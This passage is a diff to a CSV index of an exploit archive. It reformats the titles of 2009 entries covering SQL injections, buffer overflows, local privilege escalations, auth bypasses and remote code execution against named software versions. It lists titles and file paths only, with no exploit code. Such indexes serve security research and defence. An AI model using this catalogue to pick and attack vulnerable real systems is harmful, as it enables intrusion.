Exploit",2009-04-28,Cyber-Zone,windows,remote,0 -8562,platforms/windows/remote/8562.html,"Symantec Fax Viewer Control 10 (DCCFAXVW.DLL) Remote BoF Exploit",2009-04-29,Nine:Situations:Group,windows,remote,0 -8563,platforms/php/webapps/8563.txt,"eLitius 1.0 (banner-details.php id) SQL Injection",2009-04-29,snakespc,php,webapps,0 +8562,platforms/windows/remote/8562.html,"Symantec Fax Viewer Control 10 - (DCCFAXVW.DLL) Remote BoF Exploit",2009-04-29,Nine:Situations:Group,windows,remote,0 +8563,platforms/php/webapps/8563.txt,"eLitius 1.0 - (banner-details.php id) SQL Injection",2009-04-29,snakespc,php,webapps,0 8564,platforms/windows/remote/8564.pl,"Baby Web Server 2.7.2.0 - Arbitrary File Disclosure Exploit",2009-04-29,ZoRLu,windows,remote,0 8565,platforms/php/webapps/8565.txt,"ProjectCMS 1.0b (index.php sn) Remote SQL Injection",2009-04-29,YEnH4ckEr,php,webapps,0 8566,platforms/php/webapps/8566.txt,"S-CMS 1.1 Stable (page) Local File Inclusion",2009-04-29,ZoRLu,php,webapps,0 8567,platforms/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,php,webapps,0 -8568,platforms/windows/dos/8568.pl,"mpegable Player 2.12 (YUV File) Local Stack Overflow PoC",2009-04-29,GoLd_M,windows,dos,0 +8568,platforms/windows/dos/8568.pl,"mpegable Player 2.12 - (YUV File) Local Stack Overflow PoC",2009-04-29,GoLd_M,windows,dos,0 8569,platforms/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0 8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0 8571,platforms/php/webapps/8571.txt,"Tiger Dms (Auth Bypass) Remote SQL Injection",2009-04-29,"ThE g0bL!N",php,webapps,0 8572,platforms/linux/local/8572.c,"Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) - UDEV < 141 Local Privilege Escalation Exploit (2)",2009-04-30,"Jon Oberheide",linux,local,0 -8573,platforms/windows/dos/8573.html,"Google Chrome 1.0.154.53 (Null Pointer) Remote Crash Exploit",2009-04-30,"Aditya K Sood",windows,dos,0 -8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 (searchterm) Blind SQL Injection Exploit",2009-04-30,YEnH4ckEr,php,webapps,0 +8573,platforms/windows/dos/8573.html,"Google Chrome 1.0.154.53 - (Null Pointer) Remote Crash Exploit",2009-04-30,"Aditya K Sood",windows,dos,0 +8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 - (searchterm) Blind SQL Injection Exploit",2009-04-30,YEnH4ckEr,php,webapps,0 8577,platforms/php/webapps/8577.txt,"leap CMS 0.1.4 - (SQL/XSS/su) Multiple Vulnerabilities",2009-04-30,YEnH4ckEr,php,webapps,0 8578,platforms/windows/dos/8578.pl,"Mercury Audio Player 1.21 - (.M3U) Local Stack Overflow PoC",2009-04-30,SirGod,windows,dos,0 8579,platforms/windows/remote/8579.html,"BaoFeng ActiveX OnBeforeVideoDownload() Remote BoF Exploit",2009-04-30,MITBOY,windows,remote,0 @@ -8096,7 +8096,7 @@ id,file,description,date,author,platform,type,port 8590,platforms/windows/local/8590.py,"Beatport Player 1.0.0.283 - (.m3u) Local SEH Overwrite Exploit",2009-05-01,His0k4,windows,local,0 8591,platforms/windows/local/8591.py,"Beatport Player 1.0.0.283 - (.M3U) Local Stack Overflow Exploit (2)",2009-05-01,"Encrypt3d.M!nd ",windows,local,0 8592,platforms/windows/local/8592.pl,"Beatport Player 1.0.0.283 - (.M3U) Local Stack Overflow Exploit (3)",2009-05-01,Stack,windows,local,0 -8593,platforms/php/webapps/8593.txt,"pecio CMS 1.1.5 (index.php language) Local File Inclusion",2009-05-01,SirGod,php,webapps,0 +8593,platforms/php/webapps/8593.txt,"pecio CMS 1.1.5 - (index.php language) Local File Inclusion",2009-05-01,SirGod,php,webapps,0 8594,platforms/windows/local/8594.pl,"RM Downloader - (.smi) Universal Local Buffer Overflow Exploit",2009-05-01,Stack,windows,local,0 8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 < 9.0 - getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0 8596,platforms/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b Remote Database Disclosure Exploit",2009-05-04,ZoRLu,asp,webapps,0 @@ -8109,7 +8109,7 @@ id,file,description,date,author,platform,type,port 8603,platforms/php/webapps/8603.php,"eLitius 1.0 - Remote Command Execution Exploit",2009-05-04,G4N0K,php,webapps,0 8604,platforms/php/webapps/8604.txt,"PHP Site Lock 2.0 Insecure Cookie Handling",2009-05-04,"ThE g0bL!N",php,webapps,0 8605,platforms/php/webapps/8605.txt,"Million Dollar Text Links 1.0 - Arbitrary Auth Bypass",2009-05-04,"ThE g0bL!N",php,webapps,0 -8606,platforms/windows/dos/8606.py,"Quick 'n Easy Mail Server 3.3 (Demo) Remote Denial of Service PoC",2009-05-04,shinnai,windows,dos,0 +8606,platforms/windows/dos/8606.py,"Quick 'n Easy Mail Server 3.3 - (Demo) Remote Denial of Service PoC",2009-05-04,shinnai,windows,dos,0 8607,platforms/windows/dos/8607.pl,"Bmxplay 0.4.4b - (.BMX) Local Buffer Overflow PoC",2009-05-04,SirGod,windows,dos,0 8608,platforms/php/webapps/8608.txt,"projectcms 1.1b - Multiple Vulnerabilities",2009-05-04,YEnH4ckEr,php,webapps,0 8609,platforms/php/webapps/8609.pl,"Uguestbook 1.0b (guestbook.mdb) Arbitrary Database Disclosure Exploit",2009-05-04,Cyber-Zone,php,webapps,0 @@ -8145,18 +8145,18 @@ id,file,description,date,author,platform,type,port 8639,platforms/php/webapps/8639.htm,"Job Script 2.0 - Arbitrary Change Admin Password Exploit",2009-05-07,TiGeR-Dz,php,webapps,0 8640,platforms/windows/local/8640.pl,"Sorinara Streaming Audio Player 0.9 - (.PLA) Stack Overflow Exploit",2009-05-07,Hakxer,windows,local,0 8641,platforms/multiple/local/8641.txt,"PHP mb_ereg(i)_replace() Evaluate Replacement String",2009-05-07,80vul,multiple,local,0 -8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 (Auth Bypass) SQL Injection / DB Backup Vulnerabilities",2009-05-08,TiGeR-Dz,php,webapps,0 -8643,platforms/php/webapps/8643.txt,"Realty Web-Base 1.0 (Auth Bypass) SQL Injection",2009-05-08,"ThE g0bL!N",php,webapps,0 +8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 - (Auth Bypass) SQL Injection / DB Backup Vulnerabilities",2009-05-08,TiGeR-Dz,php,webapps,0 +8643,platforms/php/webapps/8643.txt,"Realty Web-Base 1.0 - (Auth Bypass) SQL Injection",2009-05-08,"ThE g0bL!N",php,webapps,0 8644,platforms/windows/dos/8644.pl,"ViPlay3 <= 3.00 - (.vpl) Local Stack Overflow PoC",2009-05-08,LiquidWorm,windows,dos,0 8645,platforms/php/webapps/8645.txt,"Luxbum 0.5.5/stable (Auth Bypass) SQL Injection",2009-05-08,knxone,php,webapps,0 8646,platforms/multiple/dos/8646.php,"Mortbay Jetty <= 7.0.0-pre5 Dispatcher Servlet Denial of Service Exploit",2009-05-08,ikki,multiple,dos,0 -8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 (uploadform.asp) Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0 -8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 (AlbumID) Blind SQL Injection Exploit",2009-05-08,YEnH4ckEr,php,webapps,0 +8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - (uploadform.asp) Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0 +8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 - (AlbumID) Blind SQL Injection Exploit",2009-05-08,YEnH4ckEr,php,webapps,0 8649,platforms/php/webapps/8649.php,"TinyWebGallery <= 1.7.6 - LFI / Remote Code Execution Exploit",2009-05-08,EgiX,php,webapps,0 -8650,platforms/windows/dos/8650.c,"TYPSoft FTP Server 1.11 (ABORT) Remote DoS Exploit",2009-05-11,"Jonathan Salwan",windows,dos,0 +8650,platforms/windows/dos/8650.c,"TYPSoft FTP Server 1.11 - (ABORT) Remote DoS Exploit",2009-05-11,"Jonathan Salwan",windows,dos,0 8651,platforms/windows/remote/8651.pl,"Mereo 1.8.0 - Arbitrary File Disclosure Exploit",2009-05-11,Cyber-Zone,windows,remote,0 8652,platforms/php/webapps/8652.pl,"eggBlog <= 4.1.1 - Local Directory Transversal Exploit",2009-05-11,StAkeR,php,webapps,0 -8653,platforms/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 (DT/Bypass/SU) Remote Vulnerabilities",2009-05-11,ahmadbady,php,webapps,0 +8653,platforms/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 - (DT/Bypass/SU) Remote Vulnerabilities",2009-05-11,ahmadbady,php,webapps,0 8654,platforms/php/webapps/8654.txt,"openWYSIWYG <= 1.4.7 - Local Directory Transversal",2009-05-11,StAkeR,php,webapps,0 8655,platforms/php/webapps/8655.pl,"microTopic 1 - (Rating) Remote Blind SQL Injection Exploit",2009-05-11,YEnH4ckEr,php,webapps,0 8656,platforms/windows/local/8656.py,"MPLAB IDE 8.30 - (.mcp) Universal Seh Overwrite Exploit",2009-05-11,His0k4,windows,local,0 @@ -8167,19 +8167,19 @@ id,file,description,date,author,platform,type,port 8661,platforms/windows/local/8661.pl,"CastRipper 2.50.70 - (.m3u) Universal Stack Overflow Exploit",2009-05-12,Stack,windows,local,0 8662,platforms/windows/local/8662.py,"CastRipper 2.50.70 - (.m3u) Universal Stack Overflow Exploit (Python)",2009-05-12,"Super Cristal",windows,local,0 8663,platforms/windows/local/8663.pl,"CastRipper 2.50.70 - (.pls) Universal Stack Overflow Exploit",2009-05-12,zAx,windows,local,0 -8664,platforms/php/webapps/8664.pl,"BIGACE CMS 2.5 (username) Remote SQL Injection Exploit",2009-05-12,YEnH4ckEr,php,webapps,0 +8664,platforms/php/webapps/8664.pl,"BIGACE CMS 2.5 - (username) Remote SQL Injection Exploit",2009-05-12,YEnH4ckEr,php,webapps,0 8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0 8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption PoC",2009-05-13,"e.wiZz! & shinnai",windows,remote,0 -8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0 +8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0 8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 Insecure Cookie Handling",2009-05-13,Mr.tro0oqy,php,webapps,0 8669,platforms/multiple/dos/8669.c,"IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service PoC",2009-05-13,mu-b,multiple,dos,0 8670,platforms/windows/local/8670.php,"Pinnacle Studio 12 - (.hfz) Directory Traversal",2009-05-13,Nine:Situations:Group,windows,local,0 -8671,platforms/php/webapps/8671.pl,"Family Connections CMS <= 1.9 (member) SQL Injection Exploit",2009-05-13,YEnH4ckEr,php,webapps,0 -8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 (m_username) Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0 +8671,platforms/php/webapps/8671.pl,"Family Connections CMS <= 1.9 - (member) SQL Injection Exploit",2009-05-13,YEnH4ckEr,php,webapps,0 +8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 - (m_username) Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0 8673,platforms/linux/local/8673.c,"Linux Kernel 2.6.x (Gentoo 2.6.29rc1) - ptrace_attach Local Privilege Escalation Exploit",2009-05-13,s0m3b0dy,linux,local,0 -8674,platforms/php/webapps/8674.txt,"Mlffat 2.1 (Auth Bypass / Cookie) SQL Injection",2009-05-13,Qabandi,php,webapps,0 +8674,platforms/php/webapps/8674.txt,"Mlffat 2.1 - (Auth Bypass / Cookie) SQL Injection",2009-05-13,Qabandi,php,webapps,0 8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 Products Insecure Cookie Handling",2009-05-14,G4N0K,php,webapps,0 -8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 (Auth Bypass) SQL Injection",2009-05-14,"ThE g0bL!N",php,webapps,0 +8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 - (Auth Bypass) SQL Injection",2009-05-14,"ThE g0bL!N",php,webapps,0 8677,platforms/windows/dos/8677.txt,"DigiMode Maya 1.0.2 - (.m3u / .m3l files) Buffer Overflow PoCs",2009-05-14,SirGod,windows,dos,0 8678,platforms/linux/local/8678.c,"Linux Kernel 2.6.29 - ptrace_attach() Local Root Race Condition Exploit",2009-05-14,prdelka,linux,local,0 8679,platforms/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple Remote SQL Injection Vulnerabilities",2009-05-14,YEnH4ckEr,php,webapps,0 @@ -8207,26 +8207,26 @@ id,file,description,date,author,platform,type,port 8702,platforms/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design - (SQL/XSS) Multiple Remote Vulnerabilities",2009-05-15,snakespc,php,webapps,0 8704,platforms/windows/remote/8704.txt,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass",2009-05-15,kingcope,windows,remote,0 8705,platforms/asp/webapps/8705.txt,"DMXReady Registration Manager 1.1 Database Disclosure",2009-05-15,S4S-T3rr0r!sT,asp,webapps,0 -8706,platforms/php/webapps/8706.pl,"PHPenpals <= 1.1 (mail.php ID) Remote SQL Injection Exploit",2009-05-15,Br0ly,php,webapps,0 +8706,platforms/php/webapps/8706.pl,"PHPenpals <= 1.1 - (mail.php ID) Remote SQL Injection Exploit",2009-05-15,Br0ly,php,webapps,0 8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 - (ab/XSS/SQL) Multiple Vulnerabilities",2009-05-15,YEnH4ckEr,php,webapps,0 8708,platforms/php/webapps/8708.txt,"my-gesuad 0.9.14 - (ab/SQL/XSS) Multiple Vulnerabilities",2009-05-15,YEnH4ckEr,php,webapps,0 8709,platforms/php/webapps/8709.txt,"Pc4Uploader 9.0 - Remote Blind SQL Injection",2009-05-18,Qabandi,php,webapps,0 8710,platforms/php/webapps/8710.txt,"PHP Dir Submit (Auth Bypass) SQL Injection",2009-05-18,snakespc,php,webapps,0 -8711,platforms/php/webapps/8711.txt,"Online Rental Property Script <= 5.0 (pid) SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0 +8711,platforms/php/webapps/8711.txt,"Online Rental Property Script <= 5.0 - (pid) SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0 8712,platforms/windows/dos/8712.txt,"httpdx <= 0.5b - Multiple Remote Denial of Service Vulnerabilities",2009-05-18,sico2819,windows,dos,0 8713,platforms/php/webapps/8713.txt,"coppermine photo gallery <= 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0 8714,platforms/php/webapps/8714.txt,"Flyspeck CMS 6.8 - Remote LFI / Change Add Admin Exploit",2009-05-18,ahmadbady,php,webapps,0 -8715,platforms/php/webapps/8715.txt,"Pluck 4.6.2 (langpref) Local File Inclusion Vulnerabilities",2009-05-18,ahmadbady,php,webapps,0 +8715,platforms/php/webapps/8715.txt,"Pluck 4.6.2 - (langpref) Local File Inclusion Vulnerabilities",2009-05-18,ahmadbady,php,webapps,0 8716,platforms/windows/remote/8716.py,"httpdx <= 0.5b FTP Server (USER) Remote BoF Exploit (SEH)",2009-05-18,His0k4,windows,remote,21 8717,platforms/php/webapps/8717.txt,"ClanWeb 1.4.2 - Remote Change Password / Add Admin Exploit",2009-05-18,ahmadbady,php,webapps,0 8718,platforms/php/webapps/8718.txt,"douran portal <= 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0 8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0 8720,platforms/multiple/dos/8720.c,"OpenSSL <= 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion DoS",2009-05-18,"Jon Oberheide",multiple,dos,0 8721,platforms/windows/dos/8721.pl,"Zervit Web Server 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0 -8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 (Get Request) Remote Denial of Service Exploit",2009-05-18,Stack,windows,dos,0 -8724,platforms/php/webapps/8724.txt,"LightOpenCMS 0.1 (id) Remote SQL Injection",2009-05-18,Mi4night,php,webapps,0 +8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 - (Get Request) Remote Denial of Service Exploit",2009-05-18,Stack,windows,dos,0 +8724,platforms/php/webapps/8724.txt,"LightOpenCMS 0.1 - (id) Remote SQL Injection",2009-05-18,Mi4night,php,webapps,0 8725,platforms/php/webapps/8725.php,"Jieqi CMS <= 1.5 - Remote Code Execution Exploit",2009-05-18,Securitylab.ir,php,webapps,0 -8726,platforms/asp/webapps/8726.txt,"MaxCMS 2.0 (inc/ajax.asp) Remote SQL Injection",2009-05-18,Securitylab.ir,asp,webapps,0 +8726,platforms/asp/webapps/8726.txt,"MaxCMS 2.0 - (inc/ajax.asp) Remote SQL Injection",2009-05-18,Securitylab.ir,asp,webapps,0 8727,platforms/php/webapps/8727.txt,"DGNews 3.0 Beta (id) Remote SQL Injection",2009-05-18,Cyber-Zone,php,webapps,0 8728,platforms/php/webapps/8728.htm,"PHP Article Publisher Remote Change Admin Password Exploit",2009-05-18,ahmadbady,php,webapps,0 8730,platforms/php/webapps/8730.txt,"VidShare Pro Arbitrary Shell Upload",2009-05-19,InjEctOr5,php,webapps,0 @@ -8240,21 +8240,21 @@ id,file,description,date,author,platform,type,port 8738,platforms/php/webapps/8738.txt,"Dog Pedigree Online Database 1.0.1b - Multiple SQL Injection Vulnerabilities",2009-05-19,YEnH4ckEr,php,webapps,0 8739,platforms/php/webapps/8739.txt,"Dog Pedigree Online Database 1.0.1b - Insecure Cookie Handling",2009-05-19,YEnH4ckEr,php,webapps,0 8740,platforms/php/webapps/8740.pl,"Dog Pedigree Online Database 1.0.1b - BlindSQL Injection Exploit",2009-05-19,YEnH4ckEr,php,webapps,0 -8741,platforms/php/webapps/8741.txt,"DM FileManager 3.9.2 (Auth Bypass) SQL Injection",2009-05-19,snakespc,php,webapps,0 +8741,platforms/php/webapps/8741.txt,"DM FileManager 3.9.2 - (Auth Bypass) SQL Injection",2009-05-19,snakespc,php,webapps,0 8742,platforms/windows/remote/8742.txt,"KingSoft Web Shield <= 1.1.0.62 - XSS/Code Execution",2009-05-19,inking,windows,remote,0 8743,platforms/php/webapps/8743.txt,"Joomla Casino 0.3.1 - Multiple SQL Injection Exploits",2009-05-20,ByALBAYX,php,webapps,0 8744,platforms/php/webapps/8744.txt,"exjune officer message system 1 - Multiple Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0 8745,platforms/php/webapps/8745.txt,"catviz 0.4.0b1 - (LFI/XSS) Multiple Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0 8746,platforms/php/webapps/8746.txt,"NC GBook 1.0 - Remote Command Injection Exploit",2009-05-20,"ThE g0bL!N",php,webapps,0 8747,platforms/php/webapps/8747.txt,"NC LinkList 1.3.1 - Remote Command Injection Exploit",2009-05-20,"ThE g0bL!N",php,webapps,0 -8748,platforms/php/webapps/8748.txt,"Realty Web-Base 1.0 (list_list.php id) SQL Injection",2009-05-20,"ThE g0bL!N",php,webapps,0 +8748,platforms/php/webapps/8748.txt,"Realty Web-Base 1.0 - (list_list.php id) SQL Injection",2009-05-20,"ThE g0bL!N",php,webapps,0 8749,platforms/asp/webapps/8749.txt,"DMXReady Registration Manager 1.1 - Arbitrary File Upload",2009-05-20,Securitylab.ir,asp,webapps,0 8750,platforms/php/webapps/8750.txt,"PHP Article Publisher Arbitrary Auth Bypass",2009-05-20,"ThE g0bL!N",php,webapps,0 -8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 (forumid) Remote Blind SQL Injection",2009-05-20,snakespc,php,webapps,0 +8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 - (forumid) Remote Blind SQL Injection",2009-05-20,snakespc,php,webapps,0 8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Remote Arbitrary Remove Projects/Tasks Vulnerabilities",2009-05-20,YEnH4ckEr,php,webapps,0 8753,platforms/osx/remote/8753.txt,"Mac OS X - Java applet Remote Deserialization Remote PoC (Updated)",2009-05-20,"Landon Fuller",osx,remote,0 8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0 -8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 (Auth Bypass) SQL Injection",2009-05-21,Striker7,php,webapps,0 +8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - (Auth Bypass) SQL Injection",2009-05-21,Striker7,php,webapps,0 8756,platforms/asp/webapps/8756.txt,"asp inline corporate calendar - (SQL/XSS) Multiple Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0 8757,platforms/windows/remote/8757.html,"BaoFeng (config.dll) ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0 8758,platforms/windows/remote/8758.html,"ChinaGames (CGAgent.dll) ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0 @@ -8276,7 +8276,7 @@ id,file,description,date,author,platform,type,port 8776,platforms/php/webapps/8776.txt,"photovideotube 1.11 - Multiple Vulnerabilities",2009-05-22,Hakxer,php,webapps,0 8777,platforms/windows/dos/8777.txt,"Soulseek 157 NS x / 156.x - Remote Distributed Search Code Execution",2009-05-26,"laurent gaffié ",windows,dos,0 8778,platforms/php/webapps/8778.txt,"minitwitter 0.3-beta - (SQL/XSS) Multiple Vulnerabilities",2009-05-26,YEnH4ckEr,php,webapps,0 -8779,platforms/php/webapps/8779.txt,"Joomla Boy Scout Advancement 0.3 (id) SQL Injection Exploit",2009-05-26,YEnH4ckEr,php,webapps,0 +8779,platforms/php/webapps/8779.txt,"Joomla Boy Scout Advancement 0.3 - (id) SQL Injection Exploit",2009-05-26,YEnH4ckEr,php,webapps,0 8780,platforms/windows/local/8780.php,"COWON America jetCast 2.0.4.1109 - (.mp3) Local Overflow Exploit",2009-05-26,Nine:Situations:Group,windows,local,0 8781,platforms/php/webapps/8781.txt,"Dokuwiki 2009-02-14 - Local File Inclusion",2009-05-26,girex,php,webapps,0 8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - (ps_drv.sys) Local Privilege Escalation Exploit",2009-05-26,"NT Internals",windows,local,0 @@ -8286,7 +8286,7 @@ id,file,description,date,author,platform,type,port 8786,platforms/multiple/remote/8786.txt,"Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure",2009-05-26,venatir,multiple,remote,0 8787,platforms/php/webapps/8787.txt,"MyFirstCMS <= 1.0.2 - Remote Arbitrary File Delete",2009-05-26,darkjoker,php,webapps,0 8788,platforms/php/webapps/8788.txt,"Mole Adult Portal Script (profile.php user_id) SQL Injection",2009-05-26,Qabandi,php,webapps,0 -8789,platforms/windows/local/8789.py,"Slayer 2.4 (skin) Universal Buffer Overflow Exploit (SEH)",2009-05-26,SuNHouSe2,windows,local,0 +8789,platforms/windows/local/8789.py,"Slayer 2.4 - (skin) Universal Buffer Overflow Exploit (SEH)",2009-05-26,SuNHouSe2,windows,local,0 8790,platforms/php/webapps/8790.pl,"cpCommerce 1.2.x - GLOBALS[prefix] Arbitrary File Inclusion Exploit",2009-05-26,StAkeR,php,webapps,0 8791,platforms/php/webapps/8791.txt,"WordPress Plugin Lytebox - (wp-lytebox) Local File Inclusion",2009-05-26,TurkGuvenligi,php,webapps,0 8792,platforms/php/webapps/8792.txt,"Webradev Download Protect 1.0 - Remote File Inclusion Vulnerabilities",2009-05-26,asL-Sabia,php,webapps,0 @@ -8299,54 +8299,54 @@ id,file,description,date,author,platform,type,port 8799,platforms/windows/local/8799.txt,"PHP <= 5.2.9 - Local Safemod Bypass Exploit (Win32)",2009-05-26,Abysssec,windows,local,0 8801,platforms/php/webapps/8801.txt,"Joomla Component com_rsgallery2 1.14.x/2.x - Remote Backdoor",2009-05-26,"Jan Van Niekerk",php,webapps,0 8802,platforms/php/webapps/8802.txt,"Kensei Board <= 2.0.0b - Multiple SQL Injection Vulnerabilities",2009-05-26,cOndemned,php,webapps,0 -8803,platforms/php/webapps/8803.txt,"MyForum 1.3 (Auth Bypass) Remote SQL Injection",2009-05-26,"ThE g0bL!N",php,webapps,0 +8803,platforms/php/webapps/8803.txt,"MyForum 1.3 - (Auth Bypass) Remote SQL Injection",2009-05-26,"ThE g0bL!N",php,webapps,0 8804,platforms/windows/remote/8804.py,"Soulseek 157 NS Remote Buffer Overflow Exploit (SEH)",2009-05-26,His0k4,windows,remote,2242 8805,platforms/php/webapps/8805.txt,"Flash Image Gallery 1.1 - Arbitrary Config File Disclosure",2009-05-26,DarkbiteX,php,webapps,0 8806,platforms/windows/remote/8806.pl,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Perl)",2009-05-26,ka0x,windows,remote,0 -8807,platforms/php/webapps/8807.htm,"ShaadiClone 2.0 (addadminmembercode.php) Add Admin Exploit",2009-05-26,x.CJP.x,php,webapps,0 -8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 (Auth Bypass) SQL Injection",2009-05-26,ByALBAYX,php,webapps,0 -8809,platforms/php/webapps/8809.htm,"ZeeCareers 2.0 (addadminmembercode.php) Add Admin Exploit",2009-05-26,x.CJP.x,php,webapps,0 -8810,platforms/php/webapps/8810.txt,"WebMember 1.0 (formID) Remote SQL Injection",2009-05-26,KIM,php,webapps,0 +8807,platforms/php/webapps/8807.htm,"ShaadiClone 2.0 - (addadminmembercode.php) Add Admin Exploit",2009-05-26,x.CJP.x,php,webapps,0 +8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 - (Auth Bypass) SQL Injection",2009-05-26,ByALBAYX,php,webapps,0 +8809,platforms/php/webapps/8809.htm,"ZeeCareers 2.0 - (addadminmembercode.php) Add Admin Exploit",2009-05-26,x.CJP.x,php,webapps,0 +8810,platforms/php/webapps/8810.txt,"WebMember 1.0 - (formID) Remote SQL Injection",2009-05-26,KIM,php,webapps,0 8811,platforms/php/webapps/8811.txt,"Joomla Component Com_Agora 3.0.0 RC1 - Remote File Upload",2009-05-26,ByALBAYX,php,webapps,0 8812,platforms/php/webapps/8812.txt,"Dokuwiki 2009-02-14 - Remote/Temporary File Inclusion Exploit",2009-05-26,Nine:Situations:Group,php,webapps,0 8813,platforms/php/webapps/8813.txt,"Million Dollar Text Links 1.x Insecure Cookie Handling",2009-05-27,HxH,php,webapps,0 8814,platforms/php/webapps/8814.txt,"Joomla Component AgoraGroup 0.3.5.3 - Blind SQL Injection",2009-05-27,"Chip d3 bi0s",php,webapps,0 8815,platforms/php/webapps/8815.txt,"Easy Px 41 CMS 09.00.00B1 - (fiche) Local File Inclusion",2009-05-27,"ThE g0bL!N",php,webapps,0 -8816,platforms/php/webapps/8816.txt,"SiteX <= 0.7.4.418 (THEME_FOLDER) Local File Inclusion Vulnerabilities",2009-05-27,ahmadbady,php,webapps,0 -8817,platforms/php/webapps/8817.txt,"Evernew Free Joke Script 1.2 (cat_id) Remote SQL Injection",2009-05-27,taRentReXx,php,webapps,0 +8816,platforms/php/webapps/8816.txt,"SiteX <= 0.7.4.418 - (THEME_FOLDER) Local File Inclusion Vulnerabilities",2009-05-27,ahmadbady,php,webapps,0 +8817,platforms/php/webapps/8817.txt,"Evernew Free Joke Script 1.2 - (cat_id) Remote SQL Injection",2009-05-27,taRentReXx,php,webapps,0 8818,platforms/php/webapps/8818.txt,"AdPeeps 8.5d1 - XSS and HTML Injection Vulnerabilities",2009-05-27,intern0t,php,webapps,0 8819,platforms/php/webapps/8819.txt,"small pirate 2.1 - (XSS/SQL) Multiple Vulnerabilities",2009-05-29,YEnH4ckEr,php,webapps,0 8820,platforms/php/webapps/8820.txt,"amember 3.1.7 - (XSS/SQL/hi) Multiple Vulnerabilities",2009-05-29,intern0t,php,webapps,0 8821,platforms/php/webapps/8821.txt,"Joomla Component JVideo 0.3.x SQL Injection",2009-05-29,"Chip d3 bi0s",php,webapps,0 -8822,platforms/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 (KEYGEN) Remote Denial of Service Exploit",2009-05-29,"Thierry Zoller",multiple,dos,0 +8822,platforms/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 - (KEYGEN) Remote Denial of Service Exploit",2009-05-29,"Thierry Zoller",multiple,dos,0 8823,platforms/php/webapps/8823.txt,"Webboard <= 2.90 beta - Remote File Disclosure",2009-05-29,MrDoug,php,webapps,0 -8824,platforms/windows/remote/8824.html,"Roxio CinePlayer 3.2 (SonicMediaPlayer.dll) Remote BoF Exploit",2009-05-29,snakespc,windows,remote,0 -8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 (Auth Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0 +8824,platforms/windows/remote/8824.html,"Roxio CinePlayer 3.2 - (SonicMediaPlayer.dll) Remote BoF 